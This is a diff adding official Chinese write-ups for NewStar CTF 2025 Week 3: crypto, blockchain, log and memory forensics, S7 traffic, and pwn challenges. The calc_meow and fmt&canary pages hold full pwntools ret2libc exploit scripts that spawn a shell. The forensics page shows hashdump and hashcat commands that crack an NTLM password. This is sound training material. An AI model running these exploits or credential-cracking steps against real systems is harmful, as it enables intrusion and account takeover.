+题目脚本比较简单,就不分析了。 + +简单来说我们需要提交两个数 $x_1,x_2$ 使得两数哈希值相同,如果不相同,会返回这两数的哈希值。这里的哈希函数是一个自定义的模二次式。 + +参数: $m=2^{22},t=5000$ +也就是说我们要在 $[0,2^{22}-1]$ 范围内找到一对**碰撞**,我们有 5000 次尝试次数。 + +理论计算可以知道,5000 次绰绰有余。 + +实际交互时,我们可以把我们提交的数和返回的哈希值用字典存起来,直到发生碰撞。 + +> [!NOTE] 如何交互? +> +> 先安装 pwn 包。 +> +> ```bash +> pip install pwn +> ``` +> +> 然后编写脚本: +> +> ```python +> from pwn import remote +> HOST,PORT = "??.??.??.??",????? +> io=remote(HOST,PORT) #连接靶机,端口。这里 io 可以看成一个交互的实例 +> print(io.recvline()) #打印靶机输出的提示信息,类型是 byte +> io.sendline(f"{x1} {x2}") #向靶机发送数字。注意如果你提交的不是 byte 格式,程序会提醒你( +> +> ``` + +> [!NOTE]- 非预期 +> 理论上你可以把$a,b,c$求出来,然后本地找碰撞。 diff --git a/docs/wp/2025/week3/crypto/random-3.md b/docs/wp/2025/week3/crypto/random-3.md new file mode 100644 index 0000000..aefa16d --- /dev/null +++ b/docs/wp/2025/week3/crypto/random-3.md @@ -0,0 +1,50 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 随机数之旅 3 + + + +本题考查线性代数。 + + +FLAG 的每个字符取其 ASCII 码得到明文向量 $x$,注意这是 42 维的。 +随机生成 $41\times 42$ 的模 $p$ 矩阵 $A$,计算 $b=Ax$ +题目输出了 $A,b,p$,目标是恢复 $x$。 + +根据题目关系有: +$$A_{41\times 42}x_{42\times1}=b_{41\times1}$$ +根据线代知识,这是欠定方程,它的解构成一个解空间: +$$x=x_p+tv,t\in Z_p$$ +其中 $x_p$ 是特解,$v$ 是 $A$ 的右核空间的基。 + +用 Sage 写就是: + +```python +A=matrix(Zmod(p),A) +b=vector(b) + +xp=A.solve_right(b) #特解 + +ArK=A.right_kernel().basis() # .basis()返回一个向量空间的基(组), +v0=ArK[0] #右核的第一个基 + +``` + +可以通过 `rank()` 函数查看矩阵的秩。容易得到 $A$ 的秩是 $41$,因此右核只有 1 维,即只有一个基。 + +方程解有多个,但 FLAG 只有一个。注意到 FLAG 中有 6 个字符已知,可以任选一个已知字符计算参数: + +```python +t=(ord("l")-xp[1])*pow(v0[1],-1,p)%p +x=xp+t*v0 +mes=list(x) + +FLAG="".join(chr(mes[i]) for i in range(42)) +print(FLAG) +``` diff --git a/docs/wp/2025/week3/index.md b/docs/wp/2025/week3/index.md new file mode 100644 index 0000000..331ccda --- /dev/null +++ b/docs/wp/2025/week3/index.md @@ -0,0 +1,9 @@ +--- +title: WriteUp +titleTemplate: ":title - NewStar CTF 2025" +comments: false +--- + +# WriteUp - NewStar CTF 2025 + +这里是 NewStar CTF 2025 Week 3 的官方 WriteUp 页面。 diff --git a/docs/wp/2025/week3/misc/ethereum-promise.md b/docs/wp/2025/week3/misc/ethereum-promise.md new file mode 100644 index 0000000..775f041 --- /dev/null +++ b/docs/wp/2025/week3/misc/ethereum-promise.md @@ -0,0 +1,23 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 区块链:以太坊的约定 + +第一题:注册小狐狸钱包即可 + +![以太坊题目页面](/assets/images/wp/2025/week3/ethereum-promise_1.png) + +第二题:查看进制转换 https://eth-converter.com/ + +![连接钱包](/assets/images/wp/2025/week3/ethereum-promise_2.jpg) + +第三题:使用区块链浏览器查看地址第一次交易 https://sepolia.etherscan.io/ + +![合约交易记录](/assets/images/wp/2025/week3/ethereum-promise_3.jpg) + +![调用合约方法](/assets/images/wp/2025/week3/ethereum-promise_4.jpg) + +第四题:使用 remix 编译部署合约 + +![获得以太坊题 FLAG](/assets/images/wp/2025/week3/ethereum-promise_5.jpg) diff --git a/docs/wp/2025/week3/misc/jail-evil-eval.md b/docs/wp/2025/week3/misc/jail-evil-eval.md new file mode 100644 index 0000000..01fa016 --- /dev/null +++ b/docs/wp/2025/week3/misc/jail-evil-eval.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# jail-evil eval diff --git a/docs/wp/2025/week3/misc/log-blind-dolphin.md b/docs/wp/2025/week3/misc/log-blind-dolphin.md new file mode 100644 index 0000000..b3e615f --- /dev/null +++ b/docs/wp/2025/week3/misc/log-blind-dolphin.md @@ -0,0 +1,53 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 日志分析:盲辨海豚 + +下载压缩包并解压,可以发现其中包含 `blindsql.log` 日志文件。 + +打开文件,可以看出这是典型的布尔盲注日志。 + +![布尔盲注日志](/assets/images/wp/2025/week3/log-blind-dolphin_1.png) + +观察响应长度,不难看出如果正确,返回长度为 `6` + +编写脚本,提取返回长度为 6 的请求日志: + +```python +with open('blindsql.log', 'r') as f: + lines = f.readlines() +logtxt = [] +for i in range(len(lines)): + log = lines[i] + if '200 6' in log: + logtxt.append(log) +with open('log.txt', 'w', encoding='utf-8') as file: + file.writelines(logtxt) +``` + +根据 SQL 注入语句可知,从第 21 条记录开始按位爆破 FLAG。 + +![按位爆破请求](/assets/images/wp/2025/week3/log-blind-dolphin_2.png) + +这里既可以手动提取并转换得到 FLAG,也可以使用正则表达式提取 FLAG 对应的 ASCII 值,再进行转码。 + +这里使用正则表达式进行演示: + +```python +import re +from urllib.parse import unquote +with open('log.txt', 'r') as f: + lines = f.readlines() +FLAG = '' +for i in range(len(lines)): + txt = lines[i] + logs = unquote(txt) + pattern = r"ascii\(substr\(\(select FLAG from sqli\.FLAG\),(\d+),1\)\)='(\d+)'" + matches = re.findall(pattern, logs) + for position, ascii_val in sorted(matches, key=lambda x: int(x[0])): + FLAG += ''.join(chr(int(ascii_val))) + print(FLAG) +``` + +运行后即可得到 FLAG。 diff --git a/docs/wp/2025/week3/misc/mem-forensics-win.md b/docs/wp/2025/week3/misc/mem-forensics-win.md new file mode 100644 index 0000000..27ce5fe --- /dev/null +++ b/docs/wp/2025/week3/misc/mem-forensics-win.md @@ -0,0 +1,335 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 内存取证:Windows 篇 + +本题是内存取证入门题,主要目的是熟悉常用工具、基础命令,以及 Kali 虚拟机或 WSL 等解题环境。 + +> 本关考验你内存取证本领,请考生携带好文具(kali 虚拟机和 Volatility2),做好准备,迎接挑战本题的 FLAG 由多个问题的答案组成,使用下划线"\_"将答案各部分连接,就能得到 FLAG +> +> 1. 恶意进程的外联 `ip:port` +> 2. 恶意进程所在的文件夹名称 +> 3. 用户的主机登录密码 +> 4. 电脑主机的名称 +> 注意:涉及字母的部分统一小写,题目附件包含 FLAG 的举例,请做题人事先确认 + +先从题目开始一点点讲解。 + +虽然 Volatility 2 和 Volatility 3 也可以在 Windows 上使用,但结合工具兼容性和本题测试情况,这里更推荐使用 Kali 虚拟机或 WSL 进行解题。 + +下面列出 Kali 虚拟机、WSL 和 Volatility 的相关参考链接: + +- Kali 虚拟机镜像安装教程:使用镜像逐步安装的版本。 +- Kali 虚拟机快速获取教程:直接获取 Kali 虚拟机的版本,比较简单快速。 +- WSL 环境配置教程 +- Volatility 2 +- Volatility 3 + +如果缺少 Python 或必要依赖,可以根据报错安装对应包;这里仅列出关键工具。 + +至此,工具应当已经安装完毕。接下来从 FLAG 要求的内容开始入手。 + +## 首先应该要获得 `imageinfo` + +使用 Volatility 2 的功能前,需要先获取题目附件的系统版本,这也是 Volatility 2 最基础的操作之一。 + +常用命令可以参考: + +- Volatility 常用命令整理 + +为了方便,直接把 `hellohacker.raw` 和 `vol.py` 放在同一路径下,然后执行: + +```shell +python2 vol.py -f hellohacker.raw imageinfo +``` + +会先出现这样的提示。 + +![imageinfo 识别系统版本](/assets/images/wp/2025/week3/mem-forensics-win_1.png) + +稍等片刻,就可以得到「可能的」系统版本。 + +![pslist 查看进程](/assets/images/wp/2025/week3/mem-forensics-win_2.png) + +一般优先使用第一个候选 Profile;如果不可用,再逐个尝试其他候选项。这里直接用第一个进行尝试。 + +## 恶意进程的外联 `ip:port` + +这里是在引导我们进行常规排查。入侵者会利用恶意进程与外部建立连接,以长期监视目标机器;这里使用一个基础命令即可查看当前状态下各进程的网络连接状况。 + +```shell +python2 vol.py -f hellohacker.raw --profile=Win7SP1x64 netscan +``` + +`netscan` 会显示内存镜像被 dump 时仍在运行的所有进程信息,包括偏移地址、协议、本地地址、外部地址、连接状态、PID、创建连接的进程和进程创建时间。 + +我们要查看可能是恶意进程的外联 `ip:port`。 + +一般来说,优先关注连接状态为 `ESTABLISHED` 的进程。这些进程正在与外部建立连接,存在外联恶意进程的嫌疑。随后还需要结合其是否存在外联 IP、进程名称等信息判断;有时候,查看 Owner 也是一个有效的判断方式。 + +在这题中,上述的几种判断方式都可以单独起到作用,因为进程的情况没有那么复杂。 + +```shell +Volatility Foundation Volatility Framework 2.6 +Offset(P) Proto Local Address Foreign Address State Pid Owner Created +0x7d540940 UDPv4 0.0.0.0:0 *:* 912 svchost.exe 2025-09-30 11:32:55 UTC+0000 +0x7d540940 UDPv6 :::0 *:* 912 svchost.exe 2025-09-30 11:32:55 UTC+0000 +0x7d727010 UDPv4 192.168.20.131:137 *:* 4 System 2025-09-30 11:27:57 UTC+0000 +0x7d75f010 UDPv4 0.0.0.0:5355 *:* 1032 svchost.exe 2025-09-30 11:28:00 UTC+0000 +0x7d75f010 UDPv6 :::5355 *:* 1032 svchost.exe 2025-09-30 11:28:00 UTC+0000 +0x7d7ce4f0 UDPv4 0.0.0.0:3702 *:* 1304 svchost.exe 2025-09-30 11:28:21 UTC+0000 +0x7d7ce4f0 UDPv6 :::3702 *:* 1304 svchost.exe 2025-09-30 11:28:21 UTC+0000 +0x7d752010 TCPv4 -:0 216.182.100.3:0 CLOSED 2 ` +?????`?????? +0x7da00590 UDPv4 0.0.0.0:53581 *:* 1304 svchost.exe 2025-09-30 11:27:54 UTC+0000 +0x7da00590 UDPv6 :::53581 *:* 1304 svchost.exe 2025-09-30 11:27:54 UTC+0000 +0x7da00ec0 UDPv4 0.0.0.0:53580 *:* 1304 svchost.exe 2025-09-30 11:27:54 UTC+0000 +0x7de9e850 UDPv4 0.0.0.0:3702 *:* 1304 svchost.exe 2025-09-30 11:28:21 UTC+0000 +0x7de9e850 UDPv6 :::3702 *:* 1304 svchost.exe 2025-09-30 11:28:21 UTC+0000 +0x7defb180 UDPv4 0.0.0.0:3702 *:* 1304 svchost.exe 2025-09-30 11:28:21 UTC+0000 +0x7df01750 UDPv4 0.0.0.0:5355 *:* 1032 svchost.exe 2025-09-30 11:28:00 UTC+0000 +0x7df0a530 UDPv4 0.0.0.0:0 *:* 1032 svchost.exe 2025-09-30 11:27:57 UTC+0000 +0x7df0a530 UDPv6 :::0 *:* 1032 svchost.exe 2025-09-30 11:27:57 UTC+0000 +0x7df173e0 UDPv4 192.168.20.131:138 *:* 4 System 2025-09-30 11:27:57 UTC+0000 +0x7da12ef0 TCPv4 0.0.0.0:49155 0.0.0.0:0 LISTENING 468 services.exe +0x7da21ca0 TCPv4 0.0.0.0:49155 0.0.0.0:0 LISTENING 468 services.exe +0x7da21ca0 TCPv6 :::49155 :::0 LISTENING 468 services.exe +0x7ddb7730 TCPv4 0.0.0.0:5357 0.0.0.0:0 LISTENING 4 System +0x7ddb7730 TCPv6 :::5357 :::0 LISTENING 4 System +0x7de1c5d0 TCPv4 0.0.0.0:49156 0.0.0.0:0 LISTENING 508 lsass.exe +0x7de1c5d0 TCPv6 :::49156 :::0 LISTENING 508 lsass.exe +0x7de81630 TCPv4 0.0.0.0:49156 0.0.0.0:0 LISTENING 508 lsass.exe +0x7dee54a0 TCPv4 192.168.20.131:139 0.0.0.0:0 LISTENING 4 System +0x7df1ec70 TCPv4 0.0.0.0:49154 0.0.0.0:0 LISTENING 912 svchost.exe +0x7df27660 TCPv4 0.0.0.0:49154 0.0.0.0:0 LISTENING 912 svchost.exe +0x7df27660 TCPv6 :::49154 :::0 LISTENING 912 svchost.exe +0x7e1680c0 TCPv4 0.0.0.0:135 0.0.0.0:0 LISTENING 728 svchost.exe +0x7e16e7b0 TCPv4 0.0.0.0:135 0.0.0.0:0 LISTENING 728 svchost.exe +0x7e16e7b0 TCPv6 :::135 :::0 LISTENING 728 svchost.exe +0x7e174c20 TCPv4 0.0.0.0:49152 0.0.0.0:0 LISTENING 404 wininit.exe +0x7e17e980 TCPv4 0.0.0.0:49152 0.0.0.0:0 LISTENING 404 wininit.exe +0x7e17e980 TCPv6 :::49152 :::0 LISTENING 404 wininit.exe +0x7e1a32e0 TCPv4 0.0.0.0:49153 0.0.0.0:0 LISTENING 776 svchost.exe +0x7e1a5210 TCPv4 0.0.0.0:49153 0.0.0.0:0 LISTENING 776 svchost.exe +0x7e1a5210 TCPv6 :::49153 :::0 LISTENING 776 svchost.exe +0x7e0707f0 TCPv6 -:0 a856:7e03:80fa:ffff:a856:7e03:80fa:ffff:0 CLOSED 1032 svchost.exe +0x7e1698d0 TCPv4 -:0 8.235.100.3:0 CLOSED 1 =U???? +0x7ef8bbf0 TCPv4 0.0.0.0:445 0.0.0.0:0 LISTENING 4 System +0x7ef8bbf0 TCPv6 :::445 :::0 LISTENING 4 System +0x7fe07560 UDPv4 0.0.0.0:3702 *:* 1304 svchost.exe 2025-09-30 11:28:21 UTC+0000 +0x7fd69ac0 TCPv4 192.168.20.131:49158 125.216.248.74:11451 ESTABLISHED 2864 svchost.exe +``` + +可以看到,本题中连接状态为 `ESTABLISHED` 的只有一个进程,目标较为明显。继续结合其他信息判断:存在非本地外联地址的进程只有两个,其中一个状态为 `CLOSED`,因此恶意进程大概率是最后一行的进程。再看进程名称 `svchost.exe`,这是系统中非常常见的程序,但出现在该外联场景下仍然可疑。到这里基本可以锁定目标。 + +## 恶意进程所在的文件夹名称 + +在上一题的连接状态信息中还有一项 PID,即进程 ID。这个信息可以帮助我们找到该进程所在的位置,以及与其相关的其他进程。本题只需要找到进程位置。 + +先进行文件扫描,然后结合已知的恶意进程名称 `svchost.exe` 进行特定查找。 + +```shell +python2 vol.py -f hellohacker.raw --profile=Win7SP1x64 filescan | grep "svchost" +``` + +![netscan 查看外联](/assets/images/wp/2025/week3/mem-forensics-win_3.png) + +显然,`svchost.exe` 这种可执行文件不应该存在于 `Temp` 这种路径中。该目录通常用于存放临时文件,也经常被用于放置恶意文件。因此可以锁定文件目录名称为 `temp`。 + +## 用户的主机登录密码 + +这里涉及 Volatility 2 中两种获取密码的办法:`lsadump` 和 `hashdump`。`lsadump` 可以直接得到明文密码,但是很多时候无法使用;而 `hashdump` 顾名思义,可以得到密码的 Hash 值。 + +先尝试使用: + +```shell +python2 vol.py -f hellohacker.raw --profile=Win7SP1x64 lsadump +``` + +![dumpfiles 提取文件](/assets/images/wp/2025/week3/mem-forensics-win_4.png) + +很遗憾,该方法不可用,只能改用 `hashdump`。 + +```shell +python2 vol.py -f hellohacker.raw --profile=Win7SP1x64 hashdump +``` + +```shell +Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +JustAGuestAwA:1000:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f::: +``` + +这里的恶意用户较为明显。需要注意,前面以 `aad` 开头的 Hash 是空密码对应的 LM Hash,不需要爆破;第二段才是需要破解的密码 Hash(以 `31d` 开头的值也是空密码对应的 NTLM Hash)。 + +```shell +3008c87294511142799dca1191e69a0f +``` + +因为本题密码非常简单,直接在在线 Hash 查询网站中也能破解 NTLM: + +- CrackStation + +密码是 `admin123`。 + +但是还是要掌握 Hashcat 的使用,而不是依赖在线网站或 CMD5,避免线下环境无法联网。 + +- Hashcat + +下载 Latest Release 后解压使用。 + +Hashcat 可以进行限定位数、限定字符范围的掩码爆破,也可以进行暴力破解或字典破解。 + +使用: + +```shell +hashcat.exe --help +``` + +可以看到一些示例以及具体的应用方式。需要学会阅读 help 内容,不要因为是英文就跳过。 + +```shell +Attack- | Hash- | + Mode | Type | Example command + ==================+=======+================================================================== + Wordlist | $P$ | hashcat -a 0 -m 400 example400.hash example.dict + Wordlist + Rules | MD5 | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule + Brute-Force | MD5 | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a + Combinator | MD5 | hashcat -a 1 -m 0 example0.hash example.dict example.dict + Association | $1$ | hashcat -a 9 -m 500 example500.hash 1word.dict -r rules/best64.rule +``` + +这里也给出了一些示例。在不掌握额外信息时,可以使用 Brute-Force。 + +先确认 Brute-Force 的各参数含义: + +```shell +hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a +``` + +`-a` 用于指定爆破类型,`3` 表示暴力破解,其他类型可以查看 help。`-m` 用于指定 Hash 类型;如果不知道类型,可以使用 `0`,工具会自动尝试不同类型,但会减慢速度。随后指定 Hash 文件,或者直接粘贴 Hash 字符。最后的 `?a?a` 是掩码;如果直接暴力破解,可以不填。 + +为了加快爆破速度,一般需要先确定 Hash 类型,然后指定 `Hash mode`。`Hash mode` 可以在 help 中看到。 + +```shell +- [ Hash Modes ] - + + please use -hh to show all supported Hash Modes +``` + +这里使用 `-hh` 而不是 `--help`,该命令输出较长,可能需要等待一段时间。 + +然后查询 Windows 用户密码使用的 Hash 类型。 + +![查询 Windows Hash 类型](/assets/images/wp/2025/week3/mem-forensics-win_5.png) + +Windows 7 SP1 x64 高于 Windows 2000,因此使用的是 NTLM Hash。 + +NTLM Hash 在 Hashcat 中对应的 mode 为 `1000`。 + +因此命令为: + +```shell +hashcat.exe -a 3 -m 1000 3008c87294511142799dca1191e69a0f +``` + +![Hashcat 破解 NTLM Hash](/assets/images/wp/2025/week3/mem-forensics-win_6.png) + +可以看到状态很快变为 `cracked`。 + +因此密码为 `admin123`。 + +## 电脑主机的名称 + +这里需要查看注册表内容,先用 `hivelist` 确定该注册表的虚拟地址。 + +```shell +python2 vol.py -f hellohacker.raw --profile=Win7SP1x64 hivelist +``` + +```shell +0xfffff8a001be2010 0x000000005e82d010 \??\C:\Users\JustAGuestAwA\AppData\Local\Microsoft\Windows\UsrClass.dat +0xfffff8a00000f010 0x000000002c4c1010 [no name] +0xfffff8a000024010 0x000000002c5cc010 \REGISTRY\MACHINE\SYSTEM +0xfffff8a000053010 0x000000002c3fb010 \REGISTRY\MACHINE\HARDWARE +0xfffff8a0000f5010 0x000000001a12e010 \SystemRoot\System32\Config\DEFAULT +0xfffff8a000745010 0x000000001a451010 \Device\HarddiskVolume1\Boot\BCD +0xfffff8a0007c3010 0x000000001a673010 \SystemRoot\System32\Config\SOFTWARE +0xfffff8a000d26010 0x0000000011ecd010 \REGISTRY\MACHINE\SECURITY +0xfffff8a000d47010 0x0000000018d67010 \SystemRoot\System32\Config\SAM +0xfffff8a000e38010 0x0000000017f84010 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT +0xfffff8a000ec8010 0x00000000111d5010 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT +0xfffff8a00199e410 0x000000006fd66410 \??\C:\Users\JustAGuestAwA\ntuser.dat +``` + +前面一列是 Virtual Address,因此查看 `\REGISTRY\MACHINE\SYSTEM` 下的键名时,需要使用 `-o` 指定偏移,并用 `printkey` 查看键名。 + +```shell +python2 vol.py -f hellohacker.raw --profile=Win7SP1x64 -o 0xfffff8a000024010 printkey +``` + +```shell +Subkeys: + (S) ControlSet001 + (S) ControlSet002 + (S) MountedDevices + (S) RNG + (S) Select + (S) Setup + (S) Software + (S) WPA + (V) CurrentControlSet +``` + +然后进一步查看 `ControlSet001`。 + +```shell +python2 vol.py -f hellohacker.raw --profile=Win7SP1x64 -o 0xfffff8a000024010 printkey -K "ControlSet001" +``` + +接下来循着这个路径查找: + +```plaintext +ControlSet001\Control\ComputerName\ComputerName +``` + +```shell +python2 vol.py -f hellohacker.raw --profile=Win7SP1x64 -o 0xfffff8a000024010 printkey -K "ControlSet001\Control\ComputerName\ComputerName" +``` + +即可找到主机名。 + +```shell +Registry: \REGISTRY\MACHINE\SYSTEM +key name: ComputerName (S) +Last updated: 2025-09-30 09:17:16 UTC+0000 + +Subkeys: + +Values: +REG_SZ : (S) mnmsrvc +REG_SZ ComputerName : (S) ARISAMIK +``` + +根据题目要求需要全小写,因此结果为 `arisamik`。 + +所以最终 FLAG 为: + +```plaintext +flag{125.216.248.74:11451_temp_admin123_arisamik} +``` + +## 结语 + +本题覆盖了基础内存取证流程,包括镜像识别、进程分析、注册表提取和 hash 破解。通过本题可以配置好常用环境,熟悉基础操作,并建立遇到工具问题时主动检索资料的习惯。 + +另外,本题也可以使用 LovelyMem 辅助完成分析: + +- LovelyMem + +该作者的其他工具也可以按需探索。`LovelyMem` 的开源版本已经足够完成本题分析。 diff --git a/docs/wp/2025/week3/misc/traffic-s7-secret.md b/docs/wp/2025/week3/misc/traffic-s7-secret.md new file mode 100644 index 0000000..c83ad11 --- /dev/null +++ b/docs/wp/2025/week3/misc/traffic-s7-secret.md @@ -0,0 +1,27 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 流量分析:S7 的秘密 + +这是一道工业流量协议的题目,在写本题之前,可以先了解一下 `s7comm` 协议报文的结构 + +![S7Comm 协议报文结构](/assets/images/wp/2025/week3/traffic-s7-secret_1.png) + +附录 7:S7Parameter->Item->Transport size 常见值 + +![Transport size 常见值](/assets/images/wp/2025/week3/traffic-s7-secret_2.png) + +![Transport size 枚举说明](/assets/images/wp/2025/week3/traffic-s7-secret_3.png) + +附录 8:S7Parameter->Item->Area 常见值 + +![Area 常见值](/assets/images/wp/2025/week3/traffic-s7-secret_4.png) + +附录 9:S7Data->Item->Return code 已知枚举值 + +![Return code 枚举值](/assets/images/wp/2025/week3/traffic-s7-secret_5.png) + +而在流量里面,对应结构可以观察到 `s7comm.resp.data` 字段是写入的值,`s7comm.param.item.address.byte` 字段影响值的顺序位置。 + +我们按照顺序排列 `s7comm.resp.data` 字段后解码即可得到 FLAG diff --git a/docs/wp/2025/week3/pwn/calc-meow.md b/docs/wp/2025/week3/pwn/calc-meow.md new file mode 100644 index 0000000..d3bcc25 --- /dev/null +++ b/docs/wp/2025/week3/pwn/calc-meow.md @@ -0,0 +1,93 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# calc_meow + +## 分析 + +由于本体的限制不够严格,导致有一个简单的非预期。 + +| `rsp - 8x` | `retaddr` | +| :--------: | :------------------------: | +| `rsp` | `numbers[] / main函数栈顶` | +| ... | ... | +| `rbp` | `main函数栈底` | + +本题开启了 `pie`,因此你没法像 `calc_beta` 那样直接编辑 ROP 链 + +但是 `retaddr` 是 `pie` 里面的地址,结合 `calc` 里面的功能,实际上我们拿到了一个任意执行 `elf` 内指令的原语。 + +而且由于 `elf` 里面有 `pop rdi; ret;` 导致本题可以直接通过 `pop rdi; func@got; ret; puts@plt;` 的办法直接拿到 libc 地址 + +拿到 libc 地址后,本题就变成了简单的 `ret2libc`,简单构造 ROP 链就可以拿到 shell + +最终 EXP 如下: + +```python +from pwn import * + +sla = lambda x,s : p.sendlineafter(x,s) +sl = lambda s : p.sendline(s) +sa = lambda x,s : p.sendafter(x,s) +s = lambda s : p.send(s) + +e = ELF('./calc') +context.arch = e.arch +context.bits = e.bits +libc = ELF('./libc.so.6') + +def menu(choice): + sla('> ', str(choice)) + +def show(): + menu(1) + nums = [] + for i in range(0, 16): + p.recvuntil(' = ') + nums.append(int(p.recvline(keepends=False), 10)) + return nums + +def add(idx1, idx2, idx3): + menu(1) + sla('>',str(idx1)) + sla('>',str(idx2)) + sla('>',str(idx3)) + +def edit(idx, content): + menu(2) + sla('>',str(idx)) + sla('>',str(content)) + +# p = remote('', 12345) +p = process('./calc') +gdb.attach(p) + +rdi = e.search(asm("pop rdi; nop; ret"), executable = True).__next__() + +edit(1, e.got['puts']) +edit(2, e.plt['puts']) +edit(3, e.sym['main']) +edit(4, -0x1cda) +edit(5, rdi) +menu(4) +add(4, 0, 0) +add(0, 1, 1) +add(0, 2, 2) +add(0, 3, 3) +add(5, 0, 0) +menu(6) +libcbase = u64(p.recv(6) + b'\x00\x00') - 0x80e50 +print(hex(libcbase)) + +libc.address = libcbase +rdi = libc.search(asm("pop rdi; ret"), executable = True).__next__() +binsh = libc.search("/bin/sh").__next__() +saddr = libc.sym['system'] +edit(1, binsh) +edit(2, rdi+1) +edit(3, saddr) +edit(0, rdi) + +p.interactive() +``` diff --git a/docs/wp/2025/week3/pwn/fmt-canary.md b/docs/wp/2025/week3/pwn/fmt-canary.md new file mode 100644 index 0000000..58bfe27 --- /dev/null +++ b/docs/wp/2025/week3/pwn/fmt-canary.md @@ -0,0 +1,107 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# fmt&canary + + + +本题考查格式化字符串漏洞泄露 canary 以及 ret2libc。 + + +在开始做这道题之前,需要对 canary 有基础了解,可以参考: + +- [Canary 实现原理](https://ctf-wiki.org/pwn/linux/user-mode/mitigation/canary/?h=canary) + +从「实现原理」部分可以知道,canary 存放在 `ebp - 0x8` / `rbp - 0x8` 的位置。 + +首先使用 IDA 分析程序。 + +![IDA 查看主函数](/assets/images/wp/2025/week3/fmt-canary_1.png) + +程序提供无限次格式化字符串利用机会,第 21 行的 `read(0, s, 0x100u);` 存在溢出,因此需要先通过格式化字符串漏洞泄露 canary,最后进行 ret2libc。 + +按照惯例,需要像 Week 2 的「刻在栈里的秘密」那样找到 canary 所在位置对应的 `n`。打开 GDB,停在 `printf` 之前。 + +![canary 栈位置](/assets/images/wp/2025/week3/fmt-canary_2.png) + +可以看到 `rbp - 8` 的位置就是 canary,也可以在 GDB 中输入 `canary` 进行验证。 + +![计算 canary 偏移](/assets/images/wp/2025/week3/fmt-canary_3.png) + +这里使用 `dist $rsp` 计算该位置与栈顶之间的偏移: + +```plaintext +pwndbg> +0x7ffe7d5b88d8->0x7ffe7d5b88b0 is -0x28 bytes (-0x5 words) +pwndbg> p 5 + 6 +$3 = 11 +``` + +这样即可得到 canary 所在位置与栈顶之间的距离,最后手动加上 6 即可。泄露 canary 后,接下来需要泄露 libc。这里有两种方式: + +1. 输入某个函数的 GOT 地址,配合 `%s` 泄露 GOT 内容。 + +例如 `%7$s` 对应的就是 `puts@got` 的地址。 +![puts GOT 泄露示例](/assets/images/wp/2025/week3/fmt-canary_4.png) + +2. 直接泄露栈上残留的 `__libc_start_call_main` + +![泄露 libc 地址](/assets/images/wp/2025/week3/fmt-canary_5.png) + +该方式与泄露 canary 的方式一致,但要计算 libc 基地址还需要额外处理。 + +首先在 GDB 中使用 `vmmap` 命令查看程序各段的地址和范围,其中包括 libc 基地址。栈上残留的 `__libc_start_call_main+128` 与 libc 基地址之间的偏移是固定值,因此只要泄露 `__libc_start_call_main+128`,即可计算 libc 基地址。 +![vmmap 查看 libc 基地址](/assets/images/wp/2025/week3/fmt-canary_6.png) +该方法的前提是本地已经 patch 对应版本的 libc 和 ld。相关操作可以参考 [patchelf 的功能以及使用 patchelf 修改 rpath 以解决动态库问题](https://blog.csdn.net/Longyu_wlz/article/details/108550528)。 + +泄露出了 libc,最后就是溢出打 ret2libc 了。 +程序中没有 `pop rdi; ret` 这个 gadget,但 libc 中通常存在。由于已经泄露 libc 基地址,因此可以在 libc 中查找所需 gadget。注意需要将 `canary` 放回 `rbp - 8` 的位置,否则会触发栈溢出检测。 + +下面给出 EXP: + +```python +from pwn import * + +context(arch='amd64', log_level = 'debug',os = 'linux') +file='./fmt_canary' +elf=ELF(file) +libc = ELF('./libc.so.6') + +port = +ns = '' +p = remote(ns,port) +# p = process(file) + +p.sendafter('说话!\n','%11$p') +canary = int(p.recv(18),16) +# 接收 18 个字符 + +## 通过 puts@got 来泄露 libc +p.sendafter('说话!\n',b'%7$saaaa' + p64(elf.got.puts)) +puts_addr = u64(p.recv(6).ljust(8,b'\x00')) +libc_base = puts_addr - libc.sym.puts + +## 通过 __libc_start_call_main+128 泄露 libc +# sa('说话!\n',b'%13$p') +# libc_base = int(r(14),16) - 0x29d90 + +libc.address = libc_base + +p.sendlineafter('说话!\n','end') + +rop = ROP(libc) +rop.raw(rop.ret.address) # 栈平衡 +rop.system(next(libc.search(b"/bin/sh\0"))) + +payload = p64(canary) +payload = payload.rjust(0x30,b'a') +payload += b'a'*8 + rop.chain() +p.sendafter('复读机好像怪怪的,你有发现什么吗 QwQ:',payload) + +p.interactive() +``` diff --git a/docs/wp/2025/week3/pwn/only-read.md b/docs/wp/2025/week3/pwn/only-read.md new file mode 100644 index 0000000..b6b24e9 --- /dev/null +++ b/docs/wp/2025/week3/pwn/only-read.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# only_read diff --git a/docs/wp/2025/week3/pwn/sandbox-plus.md b/docs/wp/2025/week3/pwn/sandbox-plus.md new file mode 100644 index 0000000..0ec1dbd --- /dev/null +++ b/docs/wp/2025/week3/pwn/sandbox-plus.md @@ -0,0 +1,113 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# sandbox_plus + +![程序主逻辑](/assets/images/wp/2025/week3/sandbox-plus_1.jpg) + +这道题目还是考查 `shellcode`,但是在执行之前会先经过一个 `install_seccomp` 函数,我们去看看函数内容。 + +![seccomp 沙箱安装函数](/assets/images/wp/2025/week3/sandbox-plus_2.jpg) + +可以看到程序加载了 seccomp 沙箱。可以通过 `seccomp-tools dump 文件地址` 